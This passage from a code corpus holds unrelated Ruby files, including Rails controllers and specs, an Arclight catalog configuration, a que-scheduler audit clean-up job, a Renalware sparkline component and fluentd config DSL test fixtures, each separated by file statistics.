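    #   hex_to_bin("0x1234")          # => "\x12\x34"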
def self.normalize_tx_for_json!(transaction)
transaction[:inputs].each do |input|
input[:args] = input[:args].map { |arg| bin_to_prefix_hex(arg) }
end
transaction[:outputs].each do |output|
output[:data] = bin_to_prefix_hex(output[:data])
lock = output[:lock]
lock[:args] = lock[:args].map { |arg| bin_to_prefix_hex(arg) }
next unless output[:type]
type = output[:type]
type[:args] = type[:args].map { |arg| bin_to_prefix_hex(arg) }
end
transaction
end
end
end
| 28.516854 | 75 | 0.633964 |
e95d2eb2ba82f867d88961de49493d48d183820b | 161 | # This file is used by Rack-based servers to start the application.
require ::File.expand_path('../config/environment', __FILE__)
run Pmacctstats::Application
| 32.2 | 67 | 0.776398 |
ab2f55ef0de5b09f80d8fc7ab06e666d5c43fac4 | 1,404 | module Commissioner
class ToolsController < ApplicationController
before_action :commissioner_required
def index
end
# NEW SEASON
# Creates new players, deletes inactive players and players not in league, updates player if new team, adds cbs data
def update_available_players
FdPlayer.new.update_all_player_info
flash[:notice] = "Players updated."
redirect_to commissioner_path
end
# Updates data for TLFL teams and Team DSTs
def update_team_data # link to button on tools page
task = FdTeam.new
task.update_team_dst_data
task.update_tlfl_team_data
flash[:notice] = "Team data updated."
redirect_to commissioner_path
end
    # Checks whether each player's name in the database matches the CBS name for the same CBS ID - if it is a different player, manually change the CBS and ESB IDs
def check_cbs_id
@hash = {}
cbs_resp = Faraday.get "http://api.cbssports.com/fantasy/players/list?version=3.0&SPORT=football&response_format=json"
cbs_json = JSON.parse(cbs_resp.body)
players = Player.all
cbs_json["body"]["players"].each do |cbs_player|
players.each do |player|
if player.cbs_id == cbs_player["id"].to_i && player.full_name != cbs_player["fullname"]
@hash[player.full_name] = cbs_player["fullname"]
end
end
end
end
end
end | 32.651163 | 125 | 0.660969 |
4a50a54c3e5aed41e0b3de74d5c5bc445abe93b6 | 26 | module HangoutsHelper
end
| 8.666667 | 21 | 0.884615 |
61c21d7a7d349a4c6e5e67b0f9cc905f4c681966 | 3,032 | # This file is copied to spec/ when you run 'rails generate rspec:install'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../../config/environment', __FILE__)
# Prevent database truncation if the environment is production
abort("The Rails environment is running in production mode!") if Rails.env.production?
require 'spec_helper'
require 'rspec/rails'
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
# Dir[Rails.root.join('spec/support/**/*.rb')].each { |f| require f }
# Checks for pending migration and applies them before tests are run.
# If you are not using ActiveRecord, you can remove this line.
ActiveRecord::Migration.maintain_test_schema!
RSpec.configure do |config|
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# RSpec Rails can automatically mix in different behaviours to your tests
# based on their file location, for example enabling you to call `get` and
# `post` in specs under `spec/controllers`.
#
# You can disable this behaviour by removing the line below, and instead
# explicitly tag your specs with their type, e.g.:
#
# RSpec.describe UsersController, :type => :controller do
# # ...
# end
#
# The different available types are documented in the features, such as in
# https://relishapp.com/rspec/rspec-rails/docs
config.infer_spec_type_from_file_location!
# Filter lines from Rails gems in backtraces.
config.filter_rails_from_backtrace!
# arbitrary gems may also be filtered via:
# config.filter_gems_from_backtrace("gem name")
config.before(:suite) do
DatabaseCleaner.strategy = :transaction
DatabaseCleaner.clean_with(:truncation)
end
config.around(:each) do |example|
DatabaseCleaner.cleaning do
example.run
end
end
end
Shoulda::Matchers.configure do |config|
config.integrate do |with|
with.test_framework :rspec
with.library :rails
end
end
| 39.894737 | 86 | 0.746042 |
7a0c7fe27861ea5d37ff627ecfbf050c785ef39c | 245 | class CreateUsers < ActiveRecord::Migration[6.0]
def change
create_table :users do |t|
t.string :username
t.string :password_digest
t.string :email
t.integer :admin, default: 0
t.timestamps
end
end
end
| 18.846154 | 48 | 0.644898 |
8756a71c4def18e0703b922ed6ed95e47ce24918 | 177 | class SolvemediaConfigGenerator < Rails::Generator::Base
def manifest
record do |m|
m.file "solvemedia_config.yml", "config/solvemedia_config.yml"
end
end
end
| 22.125 | 68 | 0.723164 |
7a160ef513fc1a5d1d6ed6923dcd14bb5cb07415 | 321 | class Food < ApplicationRecord
belongs_to :user
validates :name, presence: true
validates :measurement_unit, presence: true
validates :user_id, presence: true
validates :price, numericality: { greater_than_or_equal_to: 1, only_integer: true }
def name_with_unit
"#{name} (#{measurement_unit})"
end
end
| 26.75 | 85 | 0.747664 |
6186bd88ef46d6a7be675ddcd7ff0a326d59dc35 | 19,155 | # frozen_string_literal: true
class CatalogController < ApplicationController
include BlacklightRangeLimit::ControllerOverride
include Blacklight::Catalog
include Arclight::Catalog
include Arclight::FieldConfigHelpers
configure_blacklight do |config|
## Class for sending and receiving requests from a search index
# config.repository_class = Blacklight::Solr::Repository
#
## Class for converting Blacklight's url parameters to into request parameters for the search index
# config.search_builder_class = ::SearchBuilder
#
## Model that maps search index responses to the blacklight response model
# config.response_model = Blacklight::Solr::Response
## Default parameters to send to solr for all search-like requests. See also SearchBuilder#processed_parameters
config.default_solr_params = {
rows: 10
}
# solr path which will be added to solr base url before the other solr params.
# config.solr_path = 'select'
# items to show per page, each number in the array represent another option to choose from.
# config.per_page = [10,20,50,100]
## Default parameters to send on single-document requests to Solr. These settings are the Blacklight defaults (see SearchHelper#solr_doc_params) or
## parameters included in the Blacklight-jetty document requestHandler.
#
# config.default_document_solr_params = {
# qt: 'document',
# ## These are hard-coded in the blacklight 'document' requestHandler
# # fl: '*',
# # rows: 1,
# # q: '{!term f=id v=$id}'
# }
# solr field configuration for search results/index views
config.index.title_field = 'normalized_title_ssm'
config.index.display_type_field = 'level_ssm'
# config.index.thumbnail_field = 'thumbnail_path_ss'
# solr field configuration for document/show views
# config.show.title_field = 'title_display'
config.show.display_type_field = 'level_ssm'
# config.show.thumbnail_field = 'thumbnail_path_ss'
config.add_results_document_tool(:bookmark, partial: 'bookmark_control', if: :render_bookmarks_control?)
config.add_results_collection_tool(:sort_widget)
config.add_results_collection_tool(:per_page_widget)
config.add_results_collection_tool(:view_type_group)
config.add_show_tools_partial(:bookmark, partial: 'bookmark_control', if: :render_bookmarks_control?)
config.add_show_tools_partial(:email, callback: :email_action, validator: :validate_email_params)
config.add_show_tools_partial(:sms, if: :render_sms_action?, callback: :sms_action, validator: :validate_sms_params)
config.add_show_tools_partial(:citation)
config.add_nav_action(:bookmark, partial: 'blacklight/nav/bookmark', if: :render_bookmarks_control?)
config.add_nav_action(:search_history, partial: 'blacklight/nav/search_history')
# solr fields that will be treated as facets by the blacklight application
# The ordering of the field names is the order of the display
#
# Setting a limit will trigger Blacklight's 'more' facet values link.
# * If left unset, then all facet values returned by solr will be displayed.
# * If set to an integer, then "f.somefield.facet.limit" will be added to
# solr request, with actual solr request being +1 your configured limit --
# you configure the number of items you actually want _displayed_ in a page.
# * If set to 'true', then no additional parameters will be sent to solr,
# but any 'sniffed' request limit parameters will be used for paging, with
# paging at requested limit -1. Can sniff from facet.limit or
# f.specific_field.facet.limit solr request params. This 'true' config
# can be used if you set limits in :default_solr_params, or as defaults
# on the solr side in the request handler itself. Request handler defaults
# sniffing requires solr requests to be made with "echoParams=all", for
# app code to actually have it echo'd back to see it.
#
# :show may be set to false if you don't want the facet to be drawn in the
# facet bar
#
# set :index_range to true if you want the facet pagination view to have facet prefix-based navigation
# (useful when user clicks "more" on a large facet and wants to navigate alphabetically across a large set of results)
# :index_range can be an array or range of prefixes that will be used to create the navigation (note: It is case sensitive when searching values)
config.add_facet_field 'collection_sim', label: 'Collection', limit: 10
config.add_facet_field 'creator_ssim', label: 'Creator', limit: 10
config.add_facet_field 'creators_ssim', label: 'Creator', show: false
config.add_facet_field 'date_range_sim', label: 'Date range', range: true
config.add_facet_field 'level_sim', label: 'Level', limit: 10
config.add_facet_field 'names_ssim', label: 'Names', limit: 10
config.add_facet_field 'repository_sim', label: 'Repository', limit: 10
config.add_facet_field 'geogname_sim', label: 'Place', limit: 10
config.add_facet_field 'places_ssim', label: 'Places', show: false
config.add_facet_field 'access_subjects_ssim', label: 'Subject', limit: 10
# Have BL send all facet field names to Solr, which has been the default
# previously. Simply remove these lines if you'd rather use Solr request
# handler defaults, or have no facets.
config.add_facet_fields_to_solr_request!
# solr fields to be displayed in the index (search results) view
# The ordering of the field names is the order of the display
config.add_index_field 'unitid_ssm', label: 'Unit ID'
config.add_index_field 'repository_ssm', label: 'Repository'
config.add_index_field 'normalized_date_ssm', label: 'Date'
config.add_index_field 'creator_ssm', label: 'Creator'
config.add_index_field 'language_ssm', label: 'Language'
config.add_index_field 'scopecontent_ssm', label: 'Scope Content', helper_method: :render_html_tags
config.add_index_field 'extent_ssm', label: 'Physical Description'
config.add_index_field 'accessrestrict_ssm', label: 'Conditions Governing Access', helper_method: :render_html_tags
config.add_index_field 'collection_ssm', label: 'Collection Title'
config.add_index_field 'geogname_ssm', label: 'Place'
config.add_facet_field 'has_online_content_ssim', label: 'Access', query: {
online: { label: 'Online access', fq: 'has_online_content_ssim:true' }
}
# solr fields to be displayed in the show (single result) view
# The ordering of the field names is the order of the display
# "fielded" search configuration. Used by pulldown among other places.
# For supported keys in hash, see rdoc for Blacklight::SearchFields
#
# Search fields will inherit the :qt solr request handler from
# config[:default_solr_parameters], OR can specify a different one
# with a :qt key/value. Below examples inherit, except for subject
# that specifies the same :qt as default for our own internal
# testing purposes.
#
# The :key is what will be used to identify this BL search field internally,
# as well as in URLs -- so changing it after deployment may break bookmarked
# urls. A display label will be automatically calculated from the :key,
# or can be specified manually to be different.
# This one uses all the defaults set by the solr request handler. Which
# solr request handler? The one set in config[:default_solr_parameters][:qt],
# since we aren't specifying it otherwise.
config.add_search_field 'all_fields', label: 'All Fields' do |field|
field.include_in_simple_select = true
end
config.add_search_field 'within_collection' do |field|
field.include_in_simple_select = false
field.solr_parameters = {
fq: '-level_sim:Collection'
}
end
# Field-based searches. We have registered handlers in the Solr configuration
# so we have Blacklight use the `qt` parameter to invoke them
config.add_search_field 'keyword', label: 'Keyword' do |field|
field.qt = 'search' # default
end
config.add_search_field 'name', label: 'Name' do |field|
field.qt = 'search'
field.solr_parameters = {
qf: '${qf_name}',
pf: '${pf_name}'
}
end
config.add_search_field 'place', label: 'Place' do |field|
field.qt = 'search'
field.solr_parameters = {
qf: '${qf_place}',
pf: '${pf_place}'
}
end
config.add_search_field 'subject', label: 'Subject' do |field|
field.qt = 'search'
field.solr_parameters = {
qf: '${qf_subject}',
pf: '${pf_subject}'
}
end
config.add_search_field 'title', label: 'Title' do |field|
field.qt = 'search'
field.solr_parameters = {
qf: '${qf_title}',
pf: '${pf_title}'
}
end
# "sort results by" select (pulldown)
# label in pulldown is followed by the name of the SOLR field to sort by and
# whether the sort is ascending or descending (it must be asc or desc
# except in the relevancy case).
config.add_sort_field 'score desc, title_sort asc', label: 'relevance'
config.add_sort_field 'date_sort asc', label: 'date (ascending)'
config.add_sort_field 'date_sort desc', label: 'date (descending)'
config.add_sort_field 'creator_sort asc', label: 'creator (A-Z)'
config.add_sort_field 'creator_sort desc', label: 'creator (Z-A)'
config.add_sort_field 'title_sort asc', label: 'title (A-Z)'
config.add_sort_field 'title_sort desc', label: 'title (Z-A)'
# If there are more than this many search results, no spelling ("did you
# mean") suggestion is offered.
config.spell_max = 5
# Configuration for autocomplete suggestor
config.autocomplete_enabled = true
config.autocomplete_path = 'suggest'
##
# Arclight Configurations
config.show.document_presenter_class = Arclight::ShowPresenter
config.index.document_presenter_class = Arclight::IndexPresenter
##
# Configuration for partials
config.index.partials = %i[arclight_index_default]
##
# Configuration for index actions
config.index.document_actions << :containers
config.index.document_actions << :online_content_label
config.add_results_document_tool :arclight_bookmark_control, partial: 'arclight_bookmark_control'
config.index.document_actions.delete(:bookmark)
config.show.metadata_partials = %i[
summary_field
access_field
background_field
related_field
indexed_terms_field
]
config.show.context_access_tab_items = %i[
terms_field
cite_field
in_person_field
contact_field
]
config.show.component_metadata_partials = %i[
component_field
component_indexed_terms_field
]
config.show.component_access_tab_items = %i[
component_terms_field
cite_field
in_person_field
contact_field
]
# ===========================
# COLLECTION SHOW PAGE FIELDS
# ===========================
# Collection Show Page - Summary Section
config.add_summary_field 'creators_ssim', label: 'Creator', link_to_facet: true
config.add_summary_field 'abstract_ssm', label: 'Abstract', helper_method: :render_html_tags
config.add_summary_field 'extent_ssm', label: 'Extent'
config.add_summary_field 'language_ssm', label: 'Language'
config.add_summary_field 'prefercite_ssm', label: 'Preferred citation', helper_method: :render_html_tags
# Collection Show Page - Background Section
config.add_background_field 'scopecontent_ssm', label: 'Scope and Content', helper_method: :render_html_tags
config.add_background_field 'bioghist_ssm', label: 'Biographical / Historical', helper_method: :render_html_tags
config.add_background_field 'acqinfo_ssm', label: 'Acquisition information', helper_method: :render_html_tags
config.add_background_field 'appraisal_ssm', label: 'Appraisal information', helper_method: :render_html_tags
config.add_background_field 'custodhist_ssm', label: 'Custodial history', helper_method: :render_html_tags
config.add_background_field 'processinfo_ssm', label: 'Processing information', helper_method: :render_html_tags
config.add_background_field 'arrangement_ssm', label: 'Arrangement', helper_method: :render_html_tags
config.add_background_field 'accruals_ssm', label: 'Accruals', helper_method: :render_html_tags
config.add_background_field 'phystech_ssm', label: 'Physical / technical requirements', helper_method: :render_html_tags
config.add_background_field 'physloc_ssm', label: 'Physical location', helper_method: :render_html_tags
config.add_background_field 'descrules_ssm', label: 'Rules or conventions', helper_method: :render_html_tags
# Collection Show Page - Related Section
config.add_related_field 'relatedmaterial_ssm', label: 'Related material', helper_method: :render_html_tags
config.add_related_field 'separatedmaterial_ssm', label: 'Separated material', helper_method: :render_html_tags
config.add_related_field 'otherfindaid_ssm', label: 'Other finding aids', helper_method: :render_html_tags
config.add_related_field 'altformavail_ssm', label: 'Alternative form available', helper_method: :render_html_tags
config.add_related_field 'originalsloc_ssm', label: 'Location of originals', helper_method: :render_html_tags
# Collection Show Page - Indexed Terms Section
config.add_indexed_terms_field 'access_subjects_ssim', label: 'Subjects', link_to_facet: true, separator_options: {
words_connector: '<br/>',
two_words_connector: '<br/>',
last_word_connector: '<br/>'
}
config.add_indexed_terms_field 'names_coll_ssim', label: 'Names', separator_options: {
words_connector: '<br/>',
two_words_connector: '<br/>',
last_word_connector: '<br/>'
}, helper_method: :link_to_name_facet
config.add_indexed_terms_field 'places_ssim', label: 'Places', link_to_facet: true, separator_options: {
words_connector: '<br/>',
two_words_connector: '<br/>',
last_word_connector: '<br/>'
}
# ==========================
# COMPONENT SHOW PAGE FIELDS
# ==========================
# Component Show Page - Metadata Section
config.add_component_field 'containers', label: 'Containers', accessor: 'containers', separator_options: {
words_connector: ', ',
two_words_connector: ', ',
last_word_connector: ', '
}, if: lambda { |_context, _field_config, document|
document.containers.present?
}
config.add_component_field 'abstract_ssm', label: 'Abstract', helper_method: :render_html_tags
config.add_component_field 'extent_ssm', label: 'Extent'
config.add_component_field 'scopecontent_ssm', label: 'Scope and Content', helper_method: :render_html_tags
config.add_component_field 'acqinfo_ssm', label: 'Acquisition information', helper_method: :render_html_tags
config.add_component_field 'appraisal_ssm', label: 'Appraisal information', helper_method: :render_html_tags
config.add_component_field 'custodhist_ssm', label: 'Custodial history', helper_method: :render_html_tags
config.add_component_field 'processinfo_ssm', label: 'Processing information', helper_method: :render_html_tags
config.add_component_field 'arrangement_ssm', label: 'Arrangement', helper_method: :render_html_tags
config.add_component_field 'accruals_ssm', label: 'Accruals', helper_method: :render_html_tags
config.add_component_field 'phystech_ssm', label: 'Physical / technical requirements', helper_method: :render_html_tags
config.add_component_field 'physloc_ssm', label: 'Physical location', helper_method: :render_html_tags
# Component Show Page - Indexed Terms Section
config.add_component_indexed_terms_field 'access_subjects_ssim', label: 'Subjects', link_to_facet: true, separator_options: {
words_connector: '<br/>',
two_words_connector: '<br/>',
last_word_connector: '<br/>'
}
config.add_component_indexed_terms_field 'names_ssim', label: 'Names', separator_options: {
words_connector: '<br/>',
two_words_connector: '<br/>',
last_word_connector: '<br/>'
}, helper_method: :link_to_name_facet
config.add_component_indexed_terms_field 'places_ssim', label: 'Places', link_to_facet: true, separator_options: {
words_connector: '<br/>',
two_words_connector: '<br/>',
last_word_connector: '<br/>'
}
# =================
# ACCESS TAB FIELDS
# =================
# Collection Show Page Access Tab - Terms and Conditions Section
config.add_terms_field 'accessrestrict_ssm', label: 'Restrictions', helper_method: :render_html_tags
config.add_terms_field 'userestrict_ssm', label: 'Terms of Access', helper_method: :render_html_tags
# Component Show Page Access Tab - Terms and Condition Section
config.add_component_terms_field 'accessrestrict_ssm', label: 'Restrictions', helper_method: :render_html_tags
config.add_component_terms_field 'userestrict_ssm', label: 'Terms of Access', helper_method: :render_html_tags
config.add_component_terms_field 'parent_access_restrict_ssm', label: 'Parent Restrictions', helper_method: :render_html_tags
config.add_component_terms_field 'parent_access_terms_ssm', label: 'Parent Terms of Access', helper_method: :render_html_tags
# Collection and Component Show Page Access Tab - In Person Section
config.add_in_person_field 'repository_ssm', if: :repository_config_present, label: 'Location of this collection', helper_method: :context_access_tab_repository
config.add_in_person_field 'id', if: :before_you_visit_note_present, label: 'Before you visit', helper_method: :context_access_tab_visit_note # Using ID because we know it will always exist
# Collection and Component Show Page Access Tab - How to Cite Section
config.add_cite_field 'prefercite_ssm', label: 'Preferred citation', helper_method: :render_html_tags
# Collection and Component Show Page Access Tab - Contact Section
config.add_contact_field 'repository_ssm', if: :repository_config_present, label: 'Contact', helper_method: :access_repository_contact
# Remove unused show document actions
%i[citation email sms].each do |action|
config.view_config(:show).document_actions.delete(action)
end
# Insert the breadcrumbs at the beginning
config.show.partials.unshift(:show_upper_metadata)
config.show.partials.unshift(:show_breadcrumbs)
config.show.partials.delete(:show_header)
##
# Online Contents Index View
config.view.online_contents
config.view.online_contents.display_control = false
##
# Collection Context
config.view.collection_context
config.view.collection_context.display_control = false
config.view.collection_context.partials = %i[index_collection_context]
##
# Compact index view
config.view.compact
config.view.compact.partials = %i[arclight_index_compact]
end
end
| 48.371212 | 193 | 0.728583 |
0838b9a881b855bee8eff97b05abccaf4ae1f157 | 1,613 | require 'iolaus'
require 'iolaus/util/adapter'
# Base class for handlers
#
# Handlers are attached to requests added to instances of the
# {Iolaus::Client} class. Handlers may implement {#handle_request},
# {#handle_response}, or both.
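#
# @example A minimal response handler (illustrative sketch, not part of this library)
#   require 'json'
#
#   class ParseJsonResponses < Iolaus::Handler
#     # The return value becomes the response's `handled_response`.
#     def handle_response(response)
#       JSON.parse(response.body)
#     end
#   end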
class Iolaus::Handler
include Iolaus::Util::Adapter
# @!method handle_request(request)
# Process a request before execution
#
# Process a request before it is dispatched to a {Typhoeus::Hydra}
# instance.
#
# @param request [Typhoeus::Request] The request object.
# @return [Boolean] A boolean value indicating whether the request
# should be executed.
# @!method handle_response(response)
# Process a response after execution
#
# Process the results of executing a {Typhoeus::Request}
#
# @param response [Typhoeus::Response] The response object.
# @return [Object] The result to set as `handled_response` on the
# response object.
# Return the implemented request handler
#
# @return [#call] A callable object, if {#handle_request} is implemented.
# @return [nil] A `nil` value if {#handle_request} is not implemented.
def request_handler
if self.respond_to?(:handle_request)
self.method(:handle_request)
else
nil
end
end
# Return the implemented response handler
#
# @return [#call] A callable object, if {#handle_response} is implemented.
# @return [nil] A `nil` value if {#handle_response} is not implemented.
def response_handler
if self.respond_to?(:handle_response)
self.method(:handle_response)
else
nil
end
end
end
| 28.803571 | 76 | 0.699318 |
e9a96af51dfb814bd17c1ab0af54e73f0c4cd4bf | 1,240 | require 'spec_helper'
Obfuscator ||= Ingenico::Direct::SDK::Logging::Obfuscator
ValueObfuscator ||= Ingenico::Direct::SDK::Logging::ValueObfuscator
describe Obfuscator do
subject(:sample) { Obfuscator.new(obsfs, case_insensitive) }
context 'initialize' do
let(:obsfs) { { 'k1' => ValueObfuscator.INSTANCE,
'k2' => ValueObfuscator.INSTANCE } }
context 'case sensitive' do
let(:case_insensitive) { false }
it 'deep-copies obfuscators' do
obsfs_copy = sample.instance_variable_get(:@obfuscators)
obsfs['k2'] = nil
expect(obsfs_copy).not_to be_nil
end
end
context 'case insensitive' do
let(:case_insensitive) { true }
it 'deep-copies obfuscators' do
obsfs_copy = sample.instance_variable_get(:@obfuscators)
expect(obsfs_copy['K2']).to equal(obsfs_copy['k2'])
obsfs['k2'] = nil
expect(obsfs_copy).not_to be_nil
end
end
end
context '.obfuscate_value' do
let(:obsfs) { { 'k1' => ValueObfuscator.INSTANCE } }
let(:case_insensitive) { false }
it 'uses the correct obfuscator' do
str = 'str'
expect(
sample.obfuscate_value('k1', str)
).to eq('*3')
end
end
end
| 28.181818 | 67 | 0.635484 |
7a80551282475d849ece98ec3b9a80f66f91cb3f | 1,634 | require 'test_helper'
class DinosaursControllerTest < ActionDispatch::IntegrationTest
setup do
@dinosaur = dinosaurs(:one)
end
test "should get index" do
get dinosaurs_url, as: :json
assert_response :success
end
test "should create dinosaur" do
assert_difference('Dinosaur.count') do
post dinosaurs_url, params: { dinosaur: { description: @dinosaur.description, discovery_person: @dinosaur.discovery_person, discovery_year: @dinosaur.discovery_year, distribution: @dinosaur.distribution, end_stage: @dinosaur.end_stage, genus: @dinosaur.genus, grouping: @dinosaur.grouping, meaning: @dinosaur.meaning, period: @dinosaur.period, size: @dinosaur.size, start_stage: @dinosaur.start_stage, type_species: @dinosaur.type_species } }, as: :json
end
assert_response 201
end
test "should show dinosaur" do
get dinosaur_url(@dinosaur), as: :json
assert_response :success
end
test "should update dinosaur" do
patch dinosaur_url(@dinosaur), params: { dinosaur: { description: @dinosaur.description, discovery_person: @dinosaur.discovery_person, discovery_year: @dinosaur.discovery_year, distribution: @dinosaur.distribution, end_stage: @dinosaur.end_stage, genus: @dinosaur.genus, grouping: @dinosaur.grouping, meaning: @dinosaur.meaning, period: @dinosaur.period, size: @dinosaur.size, start_stage: @dinosaur.start_stage, type_species: @dinosaur.type_species } }, as: :json
assert_response 200
end
test "should destroy dinosaur" do
assert_difference('Dinosaur.count', -1) do
delete dinosaur_url(@dinosaur), as: :json
end
assert_response 204
end
end
| 41.897436 | 468 | 0.753978 |
5d7d5caef39ac85677c2bd639d9853c6a0b7be12 | 120 | # Preview all emails at http://localhost:3000/rails/mailers/rd_mailer
class RdMailerPreview < ActionMailer::Preview
end
| 30 | 69 | 0.816667 |
2145e9f64677105010270f61f81043b556413108 | 3,397 | # frozen_string_literal: true
# rubocop:disable Metrics/ClassLength
module Renalware
module Pathology
# Renders a pathology sparkline - a small graph of patient results for a particular
# OBX (observation_description) over time.
# TODO: Move the graph config into JS. Possibly use a stimulus controller
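    #
    # A usage sketch (assuming the standard ViewComponent render call; the
    # locals below are whatever the caller has in scope):
    #
    #   render SparklineComponent.new(
    #     current_user: current_user,
    #     patient: patient,
    #     observation_description: observation_description
    #   )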
class SparklineComponent < ApplicationComponent
pattr_initialize [:current_user!, :patient!, :observation_description!]
CHART_OPTIONS = {
library: {
chart: {
type: "area",
margin: [0, 0, 0, 0],
height: 20,
width: 80,
skipClone: true,
style: {
overflow: "visible"
}
},
credits: {
enabled: false
},
title: "",
xAxis: {
type: "datetime",
tickPositions: [],
labels: {
enabled: false
},
startOnTick: false,
endOnTick: false,
title: {
text: nil
}
},
legend: {
enabled: false
},
yAxis: {
tickPositions: [0],
endOnTick: false,
startOnTick: false,
title: {
text: nil
},
min: 0,
labels: {
enabled: false
}
},
tooltip: {
hideDelay: 0,
outside: true,
shared: true,
xDateFormat: "%d-%b-%Y"
},
plotOptions: {
area: {
fillColor: {
linearGradient: {
x1: 0,
y1: 0,
x2: 0,
y2: 1
},
stops: [
[0, "#eee"],
[0.5, "#fff"]
]
}
},
series: {
animation: false,
lineWidth: 1,
shadow: false,
states: {
hover: {
lineWidth: 1
}
},
marker: {
radius: 1,
states: {
hover: {
radius: 2
}
}
},
fillOpacity: 0.25
},
column: {
negativeColor: "#910000",
borderColor: "silver"
}
}
}
}.freeze
def chart_data
@chart_data ||= patient
.observations
.where(description_id: observation_description.id)
.order(:observed_at)
.pluck([:observed_at, :result])
end
def cache_key
"#{patient.cache_key}/sparkline/#{observation_description.id}"
end
# Because we cache the component html inside the view sidecar, we want to
      # avoid implementing this method properly - ie checking if there is
      # anything to render - as that would involve querying the database, thus
      # negating the benefit of any caching.
def render?
true
end
def options
CHART_OPTIONS
end
def dom_id
@dom_id ||= ActionView::RecordIdentifier.dom_id(observation_description)
end
end
end
end
# rubocop:enable Metrics/ClassLength
| 25.350746 | 87 | 0.431557 |
08fe83e895095c0a9c1481ea51d853fff783581f | 1,699 | require "que"
# This job can optionally be scheduled to clear down the que-scheduler audit log if it
# isn't required in the long term.
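#
# A usage sketch (the retention figure is an assumption, and the exact
# enqueue call depends on the Que version in use):
#
#   Que::Scheduler::Jobs::QueSchedulerAuditClearDownJob.enqueue(
#     retain_row_count: 10_000
#   )
#
# keeps only the newest 10,000 audit rows and deletes the rest.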
module Que
module Scheduler
module Jobs
class QueSchedulerAuditClearDownJob < Que::Job
class << self
def build_sql(table_name)
<<~SQL
WITH deleted AS (
DELETE FROM #{table_name}
WHERE scheduler_job_id <= (
SELECT scheduler_job_id FROM que_scheduler_audit
ORDER BY scheduler_job_id DESC
LIMIT 1 OFFSET $1
) RETURNING *
) SELECT count(*) FROM deleted;
SQL
end
end
DELETE_AUDIT_ENQUEUED_SQL = build_sql("que_scheduler_audit_enqueued").freeze
DELETE_AUDIT_SQL = build_sql("que_scheduler_audit").freeze
# Very low priority
Que::Scheduler::VersionSupport.set_priority(self, 100)
def run(options)
retain_row_count = options.fetch(:retain_row_count)
Que::Scheduler::Db.transaction do
            # This may delete zero rows, or more than `retain_row_count` rows,
            # depending on whether anything was scheduled in each of the past
            # schedule runs
Que::Scheduler::VersionSupport.execute(DELETE_AUDIT_ENQUEUED_SQL, [retain_row_count])
# This will delete all but `retain_row_count` oldest rows
count = Que::Scheduler::VersionSupport.execute(DELETE_AUDIT_SQL, [retain_row_count])
log = "#{self.class} cleared down #{count.first.fetch(:count)} rows"
::Que.log(event: "que-scheduler".to_sym, message: log)
end
end
end
end
end
end
| 36.934783 | 97 | 0.618011 |
ed0ee0c2c9ac5bcedce485c587db687d2636296b | 12,495 | require_relative '../helper'
require 'fluent/config/element'
require "fluent/config/dsl"
TMP_DIR = File.dirname(__FILE__) + "/tmp/config_dsl#{ENV['TEST_ENV_NUMBER']}"
def write_config(path, data)
FileUtils.mkdir_p(File.dirname(path))
File.open(path, "w") {|f| f.write data }
end
def prepare_config1
write_config "#{TMP_DIR}/config_test_1.conf", %[
k1 root_config
include dir/config_test_2.conf #
@include #{TMP_DIR}/config_test_4.conf
include file://#{TMP_DIR}/config_test_5.conf
@include config.d/*.conf
]
write_config "#{TMP_DIR}/dir/config_test_2.conf", %[
k2 relative_path_include
@include ../config_test_3.conf
]
write_config "#{TMP_DIR}/config_test_3.conf", %[
k3 relative_include_in_included_file
]
write_config "#{TMP_DIR}/config_test_4.conf", %[
k4 absolute_path_include
]
write_config "#{TMP_DIR}/config_test_5.conf", %[
k5 uri_include
]
write_config "#{TMP_DIR}/config.d/config_test_6.conf", %[
k6 wildcard_include_1
<elem1 name>
include normal_parameter
</elem1>
]
write_config "#{TMP_DIR}/config.d/config_test_7.conf", %[
k7 wildcard_include_2
]
write_config "#{TMP_DIR}/config.d/config_test_8.conf", %[
<elem2 name>
@include ../dir/config_test_9.conf
</elem2>
]
write_config "#{TMP_DIR}/dir/config_test_9.conf", %[
k9 embeded
<elem3 name>
nested nested_value
include hoge
</elem3>
]
write_config "#{TMP_DIR}/config.d/00_config_test_8.conf", %[
k8 wildcard_include_3
<elem4 name>
include normal_parameter
</elem4>
]
end
def prepare_config2
write_config "#{TMP_DIR}/config_test_1.rb", DSL_CONFIG_EXAMPLE
end
DSL_CONFIG_EXAMPLE = %q[
worker {
hostname = "myhostname"
(0..9).each { |i|
source {
type :tail
path "/var/log/httpd/access.part#{i}.log"
filter ('bar.**') {
type :hoge
val1 "moge"
val2 ["foo", "bar", "baz"]
val3 10
id :hoge
subsection {
foo "bar"
}
subsection {
foo "baz"
}
}
filter ('foo.**') {
type "pass"
}
match ('{foo,bar}.**') {
type "file"
path "/var/log/httpd/access.#{hostname}.#{i}.log"
}
}
}
}
]
DSL_CONFIG_EXAMPLE_WITHOUT_WORKER = %q[
hostname = "myhostname"
source {
type :tail
path "/var/log/httpd/access.part.log"
element {
name "foo"
}
match ('{foo,bar}.**') {
type "file"
path "/var/log/httpd/access.full.log"
}
}
]
DSL_CONFIG_EXAMPLE_FOR_INCLUDE_CONF = %q[
include "#{TMP_DIR}/config_test_1.conf"
]
DSL_CONFIG_EXAMPLE_FOR_INCLUDE_RB = %q[
include "#{TMP_DIR}/config_test_1.rb"
]
DSL_CONFIG_RETURNS_NON_ELEMENT = %q[
worker {
}
[]
]
DSL_CONFIG_WRONG_SYNTAX1 = %q[
match
]
DSL_CONFIG_WRONG_SYNTAX2 = %q[
match('aa','bb'){
type :null
}
]
DSL_CONFIG_WRONG_SYNTAX3 = %q[
match('aa','bb')
]
DSL_CONFIG_WRONG_SYNTAX4 = %q[
include
]
module Fluent::Config
